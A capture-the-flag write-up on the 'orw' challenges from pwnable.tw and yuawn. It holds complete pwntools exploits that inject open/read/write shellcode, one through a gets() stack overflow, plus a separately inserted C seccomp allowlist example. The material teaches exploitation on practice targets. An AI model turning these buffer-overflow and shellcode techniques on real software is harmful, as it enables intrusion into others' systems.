pwnable orw & yuawn orw Writes up

pwntools Review

Set up the environment:

context(arch='i386',os='linux')

Register Review

Register   Bits
rax        64
eax        32

What is orw

Use only the three system calls open, read and write to obtain the flag.

What is seccomp?

seccomp restricts which system calls a process may make; analysing the program's seccomp state shows which system calls are blocked.

Install:

sudo apt install gcc ruby-dev
gem install seccomp-tools

Getting started

seccomp-tools dump <filename>
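As an added, defender-side illustration that is not part of the writeup or of the challenge binaries: a seccomp-BPF allowlist that enforces an orw-style policy (only open, read, write and exit_group may be called), which is the kind of rule set seccomp-tools dump renders for a binary. It assumes x86-64 Linux; probe_orw_filter and ORW_INSTALL_FAILED are names chosen here, and blocked calls return EPERM rather than killing the process so the effect can be observed from a parent.

```c
#include <errno.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>

#ifndef __x86_64__
#error "syscall numbers below are for the x86-64 ABI used by the 64-bit orw binary"
#endif

/* Allow syscall `nr`; otherwise fall through to the next rule. */
#define ALLOW(nr) BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, (nr), 0, 1), \
                  BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW)

static struct sock_filter orw_filter[] = {
    /* Kill calls made through another ABI (e.g. int 0x80), whose numbers differ. */
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 1, 0),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
    ALLOW(__NR_open), ALLOW(__NR_read), ALLOW(__NR_write), ALLOW(__NR_exit_group),
    /* Everything else fails with EPERM rather than KILL so the caller can observe it. */
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)),
};

#define ORW_INSTALL_FAILED 200 /* child exit code: kernel or outer sandbox refused the filter */

/* Fork a child, confine it with orw_filter and make raw syscall nr(1, "", 0) (so an
 * allowed write is a no-op). Returns 0 if the call succeeded, its errno if it failed,
 * ORW_INSTALL_FAILED if the filter was rejected, or -1 on a fork/wait error. */
int probe_orw_filter(long nr) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        struct sock_fprog prog = { sizeof(orw_filter) / sizeof(orw_filter[0]), orw_filter };
        if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) == -1 ||
            prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) == -1)
            _exit(ORW_INSTALL_FAILED);
        long ret = syscall(nr, 1, "", 0);
        _exit(ret == -1 ? errno : 0); /* exit_group is on the allowlist */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}
```

Calling probe_orw_filter(__NR_getpid) yields EPERM while probe_orw_filter(__NR_write) yields 0; ORW_INSTALL_FAILED means the environment itself forbids installing seccomp filters.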

demo yuawn orw (64-bit)

Recon

file: [image]

r2: [image]

We find that sc is a global variable and the binary gives us its address; below it, "I give you bof" reads input with gets into a buffer of size 0x10+0x8.

seccomp: [image]

exploit

from pwn import *

context(arch='amd64', os='linux')

r = process('./orw')

# open('/flag') leaves the fd in rax; read(rax, rsp, 0x100) pulls the flag onto the stack,
# then write(1, rsp, 0x100) prints it
sc = asm(shellcraft.open('/flag') + shellcraft.read('rax', 'rsp', 0x100) + shellcraft.write(1, 'rsp', 0x100))
r.sendline(sc)

# fill the 0x10+0x8 gets() buffer, then overwrite the return address with sc's address
r.sendlineafter(b':)', b'a' * 0x18 + p64(0x6010a0))
r.interactive()

demo pwnable orw (32-bit)

labs: https://pwnable.tw/static/chall/orw

Recon

file: [image]

checksec: [image]

exec: [image]

seccomp: [image]

disas main: [image]

exploit


from pwn import *

context(arch='i386', os='linux')

r = remote('chall.pwnable.tw', 10001)

# open('/home/orw/flag') leaves the fd in eax; read(eax, buf, 0x100) reads the flag onto the stack,
# then write(1, buf, 0x100) prints it (buf is ebp here)
sc = asm(shellcraft.open('/home/orw/flag') + shellcraft.read('eax', 'ebp', 0x100) + shellcraft.write(1, 'ebp', 0x100))

r.sendlineafter(b':', sc)

r.interactive()

References:

https://kazma.tw/2023/12/10/Yuawn-Pwn1-orw-Writeup/

https://kazma.tw/2024/02/07/Pwnable-tw-orw-Writeup/

https://www.youtube.com/watch?v=U8N6aE-Nq-Q

Source: https://dkri3c1.github.io/posts/pwn-pwnable-and-yuawn-wp/
Author: dkri3c1
Published: 2024-08-07